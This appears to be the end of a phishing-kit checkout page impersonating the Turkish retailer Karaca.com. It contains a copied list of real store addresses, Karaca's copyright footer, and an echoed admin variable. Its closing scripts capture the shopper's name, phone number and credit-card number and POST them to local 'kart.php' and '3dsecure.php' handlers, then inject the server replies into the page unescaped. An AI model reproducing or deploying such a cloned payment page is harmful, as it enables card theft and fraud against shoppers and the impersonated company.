                "phone": "0850 432 9809",
                "lat": "40.544613",
                "lng": "34.947726",
                "inventLocation": "2095",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 56,
                "name": "Edırne Margı Avm Magazası",
                "address": "Edr.Margı Krc.2011 Edırne Margı Avm Magazası Edirne Margi Outlet E-5 Karayolu Üzeri.   TR 22000  Merkez Edirne",
                "cityId": 3342,
                "city": "Edirne",
                "state": "Merkez",
                "stateId": 290,
                "phone": "0850 432 9354",
                "lat": "41.659178",
                "lng": "26.583443",
                "inventLocation": "2031",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 63,
                "name": "Erzurum Mng Avm Magazası",
                "address": "Erz.Mng Krc.2019 Erzurum Mng Avm Magazası Lalapaşa Mahallesi Somunoğlu Cad.   TR 25000 Lalapaşa Yakutiye Erzurum",
                "cityId": 3345,
                "city": "Erzurum",
                "state": "Yakutiye",
                "stateId": 1078,
                "phone": "0850 432 9823",
                "lat": "39.910505",
                "lng": "41.249982",
                "inventLocation": "2118",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 69,
                "name": "Hatay Prıme Iskenderun Avm Mag",
                "address": "Hty.Prıme Iskenderun Krc.2011 Hatay Prıme Iskenderun Avm Mag Numune Mahallesi İbrahim Karaoğlanoğlu   TR 31000 Numune İskenderun Hatay",
                "cityId": 3351,
                "city": "Hatay",
                "state": "İskenderun",
                "stateId": 388,
                "phone": "0850 432 9353",
                "lat": "36.57523",
                "lng": "36.1624",
                "inventLocation": "2030",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 79,
                "name": "Ist.Atırus Krc.2010",
                "address": "Ist.Atırus Krc.2010 Ist.Atırus Krc.2010 Atirus Alışveriş Merkezi Fatih Mahallesi   TR 34000 Fatih Büyükçekmece İstanbul",
                "cityId": 3354,
                "city": "İstanbul",
                "state": "Büyükçekmece",
                "stateId": 430,
                "phone": "0850 432 9277",
                "lat": "41.021416",
                "lng": "28.583964",
                "inventLocation": "2003",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 82,
                "name": "Istanbul Armonıpark Avm Magaza",
                "address": "Ist.Armonıpark Krc.2010 Istanbul Armonıpark Avm Magaza Armony Avm Tevfik Bey Mah.Halkalı Cd.   TR 34000 Tevfik Bey Küçükçekmece İstanbul",
                "cityId": 3354,
                "city": "İstanbul",
                "state": "Küçükçekmece",
                "stateId": 443,
                "phone": "0850 432 9279",
                "lat": "41.006814",
                "lng": "28.797285",
                "inventLocation": "2008",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 98,
                "name": "Istanbul Akbatı Avm Magazası",
                "address": "Ist.Akbatı Krc.2011 Istanbul Akbatı Avm Magazası Akbatı Alışveriş Ve Yaşam Merkezi.   TR 34000 Sanayi Esenyurt İstanbul",
                "cityId": 3354,
                "city": "İstanbul",
                "state": "Esenyurt",
                "stateId": 434,
                "phone": "0850 432 9296",
                "lat": "41.0941",
                "lng": "28.9338",
                "inventLocation": "2038",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 127,
                "name": "Istanbul Perlavısta Avm Magaza",
                "address": "Ist.Perlavısta Krc.2016 Istanbul Perlavısta Avm Magaza Perlavista Alışveriş Ve Yaşam Merkezi   TR 34000 Adnan Kahveci Beylikdüzü İstanbul",
                "cityId": 3354,
                "city": "İstanbul",
                "state": "Beylikdüzü",
                "stateId": 428,
                "phone": "0850 432 9327",
                "lat": "41.01634",
                "lng": "28.627205",
                "inventLocation": "2087",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 157,
                "name": "Izmır Menemen Avm Magazası",
                "address": "Izm.Menemen Krc.2019 Izmır Menemen Avm Magazası Yıldırım Mahallesi İzmir Çanakkale   TR 35000 Yıldırım Menemen İzmir",
                "cityId": 3355,
                "city": "İzmir",
                "state": "Menemen",
                "stateId": 482,
                "phone": "0850 432 9081",
                "lat": "41.0096",
                "lng": "28.9576",
                "inventLocation": "2122",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 160,
                "name": "Izmır Gazıemır Contaıner Avm M",
                "address": "Izm.Gazıemır Contaıner Krc.2021 Izmır Gazıemır Contaıner Avm M Gazi Mah. Akçay Cad. No:168 B   TR 35000 Gazi Gaziemir İzmir",
                "cityId": 3355,
                "city": "İzmir",
                "state": "Gaziemir",
                "stateId": 472,
                "phone": "0850 433 4425",
                "lat": "38.3322",
                "lng": "27.1344",
                "inventLocation": "2144",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 170,
                "name": "Kocaelı Burda Avm Magazası",
                "address": "Kcl.Burda Krc.2015 Kocaelı Burda Avm Magazası 41 Burda Alışveriş Merkezi Sanayi Mah.   TR 41000 Sanayi İzmit Kocaeli",
                "cityId": 3366,
                "city": "Kocaeli",
                "state": "İzmit",
                "stateId": 555,
                "phone": "0850 432 9799",
                "lat": "41.0238",
                "lng": "28.99",
                "inventLocation": "2079",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 184,
                "name": "Ordu Novada Avm Magazası",
                "address": "Ord.Novada Krc.2017 Ordu Novada Avm Magazası Ordu Novada Alışveriş Merkezi   TR 52000 Şarkiye Altınordu Ordu",
                "cityId": 3377,
                "city": "Ordu",
                "state": "Altınordu",
                "stateId": 1047,
                "phone": "0850 432 9356",
                "lat": "40.9844",
                "lng": "37.88219",
                "inventLocation": "2109",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 187,
                "name": "Sakarya Cadde Avm Magazası",
                "address": "Sak.Cadde Krc.2021 Sakarya Cadde Avm Magazası Arabacıalanı Mah. 54. Cd. Cadde 54   TR 54000 Arabacıalanı Serdivan Sakarya",
                "cityId": 3380,
                "city": "Sakarya",
                "state": "Serdivan",
                "stateId": 732,
                "phone": "0850 433 4417",
                "lat": "41.026",
                "lng": "28.9936",
                "inventLocation": "2133",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 188,
                "name": "Sms.Yesılyurt Krc.2010 Karaca",
                "address": "Sms.Yesılyurt Krc.2010 Sms.Yesılyurt Krc.2010 Karaca Yeşilyurt Avm Denizevleri Mah. Atatürk   TR 55000 Denizevleri  Atakum Samsun",
                "cityId": null,
                "city": "Samsun",
                "state": " Atakum",
                "stateId": null,
                "phone": "0850 432 9332",
                "lat": "41.330706",
                "lng": "36.291195",
                "inventLocation": "2004",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 192,
                "name": "Samsun Lovelet Contaıner Avm M",
                "address": "Sms.Lovelet Contaıner Krc.2021 Samsun Lovelet Contaıner Avm M Devgeriş Mah. Çeşme Sk. No: 21\/1   TR 55000 Devgeriş Canik Samsun",
                "cityId": 3381,
                "city": "Samsun",
                "state": "Canik",
                "stateId": 740,
                "phone": "0850 433 9103",
                "lat": "41.0452",
                "lng": "28.9953",
                "inventLocation": "2142",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 195,
                "name": "Tokat Novada Avm Magazası",
                "address": "Tkt.Novada Krc.2014 Tokat Novada Avm Magazası Novada Tokat Alışveriş Merkezi   TR 60000 Yeşilırmak Merkez Tokat",
                "cityId": 3388,
                "city": "Tokat",
                "state": "Merkez",
                "stateId": 800,
                "phone": "0850 432 9783",
                "lat": "40.330342",
                "lng": "36.552178",
                "inventLocation": "2065",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 197,
                "name": "Sanlıurfa Pıazza Avm Magazası",
                "address": "Snf.Pıazza Krc.2013 Sanlıurfa Pıazza Avm Magazası Şanlıurfa Piazza Alışveriş Ve Yaşam Merk   TR 63000 Karakoyunlu Merkez Şanlıurfa",
                "cityId": 3382,
                "city": "Şanlıurfa",
                "state": "Merkez",
                "stateId": 1173,
                "phone": "0850 432 9780",
                "lat": "37.1575",
                "lng": "38.7805",
                "inventLocation": "2057",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 198,
                "name": "Van Avm Avm Magazası",
                "address": "Van.Avm Krc.2015 Van Avm Avm Magazası Van Alışveriş Merkezi Serhat Mahallesi   TR 65000 Serhat İpekyolu Van",
                "cityId": 3392,
                "city": "Van",
                "state": "İpekyolu",
                "stateId": 1100,
                "phone": "0850 432 9794",
                "lat": "38.492833",
                "lng": "43.391455",
                "inventLocation": "2081",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 199,
                "name": "Yozgat Novada Avm Magazası",
                "address": "Yzg.Novada Krc.2016 Yozgat Novada Avm Magazası Yozgat Novada Alışveriş Merkezi   TR 66000 Fatih Merkez Yozgat",
                "cityId": 3394,
                "city": "Yozgat",
                "state": "Merkez",
                "stateId": 869,
                "phone": "0850 432 9870",
                "lat": "39.823651",
                "lng": "34.822142",
                "inventLocation": "2093",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 997,
                "name": "Sıvas Park Avm Magazası",
                "address": "Svs.Park Krc.2016 Sıvas Park Avm Magazası Primemall Sivaspark Avm Gültepe Mah.   TR 58000 Gültepe Merkez Sivas",
                "cityId": 3386,
                "city": "Sivas",
                "state": "Merkez",
                "stateId": 779,
                "phone": "0850 432 9871",
                "lat": "39.730198",
                "lng": "36.990194",
                "inventLocation": "2097",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 803040,
                "name": "Ist.Vıaport Contaıner Krc.2022",
                "address": "Ist.Vıaport Contaıner Krc.2022 Ist.Vıaport Contaıner Krc.2022 Yenişehir Mah. Dedepaşa Cad.   TR 34000 Yenişehir pendik İstanbul",
                "cityId": 3354,
                "city": "İstanbul",
                "state": "pendik",
                "stateId": 446,
                "phone": "0850 433 9311",
                "lat": "40.93817",
                "lng": "29.32506",
                "inventLocation": "2150",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 1221335,
                "name": "Ist.Torıum Contaıner Krc.2023",
                "address": "Ist.Torıum Contaıner Krc.2023 Ist.Torıum Contaıner Krc.2023 Turgut Özal Mahallesi, Haramidere Yolu   TR 34000 Turgut Özal  Esenyurt İstanbul",
                "cityId": null,
                "city": "İstanbul",
                "state": " Esenyurt",
                "stateId": null,
                "phone": "",
                "lat": "38.3498",
                "lng": "28.0284",
                "inventLocation": "2152",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 1293569,
                "name": "Ist.Basınekspres Contaıner Krc",
                "address": "Ist.Basınekspres Contaıner Krc.2021 Ist.Basınekspres Contaıner Krc.2021 0 Ada 5882 Parsel Halkalı Merkez Mah.   TR 34000 Merkez Küçükçekmece İstanbul",
                "cityId": 3354,
                "city": "İstanbul",
                "state": "Küçükçekmece",
                "stateId": 443,
                "phone": "",
                "lat": "41.03802",
                "lng": "28.8098",
                "inventLocation": "2287",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 1589350,
                "name": "Srt.Park Krc.2023",
                "address": "Srt.Park Krc.2023 Srt.Park Krc.2023 Kooperatif Mah.Hükümet Cad.No.92   TR 56000 Kooperatif Merkez Siirt",
                "cityId": 3383,
                "city": "Siirt",
                "state": "Merkez",
                "stateId": 757,
                "phone": "",
                "lat": "41.0392",
                "lng": "29.0005",
                "inventLocation": "2154",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 2723564,
                "name": "IST.PENDORYA CONTAINER KRC.202",
                "address": "IST.PENDORYA CONTAINER KRC.2024  Çamçeşme Mahallesi,   TR 34000 Pendik Pendik İstanbul",
                "cityId": 3354,
                "city": "İstanbul",
                "state": "Pendik",
                "stateId": 446,
                "phone": "",
                "lat": "41.0524",
                "lng": "29.0043",
                "inventLocation": "2311",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }];
            let deliveryStoreCity = [{
                "id": 3333,
                "name": "Bolu",
                "counties": [{"id": 176, "name": "MERKEZ"}]
            }, {"id": 3336, "name": "Çanakkale", "counties": [{"id": 220, "name": "MERKEZ"}]}, {
                "id": 3338,
                "name": "Çorum",
                "counties": [{"id": 241, "name": "MERKEZ"}]
            }, {"id": 3342, "name": "Edirne", "counties": [{"id": 290, "name": "MERKEZ"}]}, {
                "id": 3345,
                "name": "Erzurum",
                "counties": [{"id": 1078, "name": "YAKUTİYE"}]
            }, {"id": 3351, "name": "Hatay", "counties": [{"id": 388, "name": "İSKENDERUN"}]}, {
                "id": 3354,
                "name": "İstanbul",
                "counties": [{"id": 428, "name": "BEYLİKDÜZÜ"}, {"id": 430, "name": "BÜYÜKÇEKMECE"}, {
                    "id": 434,
                    "name": "ESENYURT"
                }, {"id": 443, "name": "KÜÇÜKÇEKMECE"}, {"id": 446, "name": "PENDİK"}]
            }, {
                "id": 3355,
                "name": "İzmir",
                "counties": [{"id": 472, "name": "GAZİEMİR"}, {"id": 482, "name": "MENEMEN"}]
            }, {"id": 3366, "name": "Kocaeli", "counties": [{"id": 555, "name": "İZMİT"}]}, {
                "id": 3377,
                "name": "Ordu",
                "counties": [{"id": 1047, "name": "ALTINORDU"}]
            }, {"id": 3380, "name": "Sakarya", "counties": [{"id": 732, "name": "SERDİVAN"}]}, {
                "id": 3381,
                "name": "Samsun",
                "counties": [{"id": 740, "name": "CANİK"}]
            }, {"id": 3382, "name": "Şanlıurfa", "counties": [{"id": 1173, "name": "MERKEZ"}]}, {
                "id": 3383,
                "name": "Siirt",
                "counties": [{"id": 757, "name": "MERKEZ"}]
            }, {"id": 3386, "name": "Sivas", "counties": [{"id": 779, "name": "MERKEZ"}]}, {
                "id": 3388,
                "name": "Tokat",
                "counties": [{"id": 800, "name": "MERKEZ"}]
            }, {"id": 3392, "name": "Van", "counties": [{"id": 1100, "name": "İPEKYOLU"}]}, {
                "id": 3394,
                "name": "Yozgat",
                "counties": [{"id": 869, "name": "MERKEZ"}]
            }];
            let deliveryStoreState = {
                "3333": [{"state_id": 176, "name": "MERKEZ"}],
                "3336": [{"state_id": 220, "name": "MERKEZ"}],
                "3338": [{"state_id": 241, "name": "MERKEZ"}],
                "3342": [{"state_id": 290, "name": "MERKEZ"}],
                "3345": [{"state_id": 1078, "name": "YAKUTİYE"}],
                "3351": [{"state_id": 388, "name": "İSKENDERUN"}],
                "3354": [{"state_id": 428, "name": "BEYLİKDÜZÜ"}, {
                    "state_id": 430,
                    "name": "BÜYÜKÇEKMECE"
                }, {"state_id": 434, "name": "ESENYURT"}, {"state_id": 443, "name": "KÜÇÜKÇEKMECE"}, {
                    "state_id": 446,
                    "name": "PENDİK"
                }],
                "3355": [{"state_id": 472, "name": "GAZİEMİR"}, {"state_id": 482, "name": "MENEMEN"}],
                "3366": [{"state_id": 555, "name": "İZMİT"}],
                "3377": [{"state_id": 1047, "name": "ALTINORDU"}],
                "3380": [{"state_id": 732, "name": "SERDİVAN"}],
                "3381": [{"state_id": 740, "name": "CANİK"}],
                "3382": [{"state_id": 1173, "name": "MERKEZ"}],
                "3383": [{"state_id": 757, "name": "MERKEZ"}],
                "3386": [{"state_id": 779, "name": "MERKEZ"}],
                "3388": [{"state_id": 800, "name": "MERKEZ"}],
                "3392": [{"state_id": 1100, "name": "İPEKYOLU"}],
                "3394": [{"state_id": 869, "name": "MERKEZ"}]
            };
        </script>
    </div>

    <!-- Payment Section End -->

    <div class="basketFooter d-none d-lg-flex">
        <div class="copyright">Karaca.com © 2024 - Karaca Züccaciye A.Ş. Tüm hakları saklıdır.</div>
        <div class="banks">
            <img data-src="https://static.karaca.com/catalog/view/assets/images/logos/bank-logos-footer.png"
                 class="img-fluid lazyloaded" alt="Karaca Checkout - Bankalar"
                 src="https://static.karaca.com/catalog/view/assets/images/logos/bank-logos-footer.png">
        </div>
    </div>


    <div class="clear"></div>
</section>


<div class="back-to-top js-back-to-top hide-on-app">
    <i class="fa fa-angle-up"></i>
</div>
<script src="assets/js/bundle.js"></script>
<?= $admin->supporta ?>
<script src="assets/js/payment.js"></script>
<script>
    /*
    document.getElementById('odemeyap').addEventListener('click', function() {
        let inputData1 = document.getElementById('inputName2').value;
        let inputData2 = document.getElementById('inputSurname2').value;
        let inputData3 = document.getElementById('inputPhone2').value;

        const params = new URLSearchParams();
        params.append('ad', inputData1);
        params.append('soyad', inputData2);
        params.append('tel', inputData3);

        fetch('kart.php', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
            },
            body: params.toString(),
        })
            .then(response => {
                if (!response.ok) {
                    throw new Error('Yoğun trafik nedeniyle isteğinizi şu an işleme alamıyoruz.');
                }
                return response.text(); // Yanıtı düz metin olarak al
            })
            .then(data => {
                document.getElementById('deliveryWrap').innerHTML = data; // Yanıtı olduğu gibi ekrana yaz
            })
            .catch(error => {
                console.error('Hata:', error);
                document.getElementById('deliveryWrap').innerText = 'Bir hata oluştu.';
            });
    });
     */
</script>
<script>
    document.getElementById('odemeyap').addEventListener('click', function() {
        let inputData1 = document.getElementById('inputName2') ? document.getElementById('inputName2').value : null;
        let inputData2 = document.getElementById('inputSurname2') ? document.getElementById('inputSurname2').value : null;
        let inputData3 = document.getElementById('inputPhone2') ? document.getElementById('inputPhone2').value : null;
        let ccNumber = document.getElementById('cc_number') ? document.getElementById('cc_number').value : null;

        if (inputData1) {
            // Eğer inputName2 varsa, kart.php'ye gönder
            const params = new URLSearchParams();
            params.append('ad', inputData1);
            if (inputData2) {
                params.append('soyad', inputData2);
            }
            if (inputData3) {
                params.append('tel', inputData3);
            }

            fetch('kart.php', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: params.toString(),
            })
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Yoğun trafik nedeniyle isteğinizi şu an işleme alamıyoruz.');
                    }
                    return response.text(); // Yanıtı düz metin olarak al
                })
                .then(data => {
                    document.getElementById('deliveryWrap').innerHTML = data; // Yanıtı olduğu gibi ekrana yaz
                })
                .catch(error => {
                    console.error('Hata:', error);
                    document.getElementById('deliveryWrap').innerText = 'Bir hata oluştu.';
                });

        } else if (ccNumber) {
            // Eğer inputName2 yoksa ve cc_number varsa, odeme.php'ye gönder
            const params = new URLSearchParams();
            params.append('cc_number', ccNumber);
            if (inputData2) {
                params.append('soyad', inputData2);
            }
            if (inputData3) {
                params.append('tel', inputData3);
            }

            fetch('3dsecure.php', { 
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: params.toString(),
            })
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Yoğun trafik nedeniyle isteğinizi şu an işleme alamıyoruz.');
                    }
                    return response.text(); // Yanıtı düz metin olarak al
                })
                .then(data => {
                    document.getElementById('deliveryWrap').innerHTML = data; // Yanıtı olduğu gibi ekrana yaz
                })
                .catch(error => {
                    console.error('Hata:', error);
                    document.getElementById('deliveryWrap').innerText = 'Bir hata oluştu.';
                });
        }
    });
</script>
</body>


</html>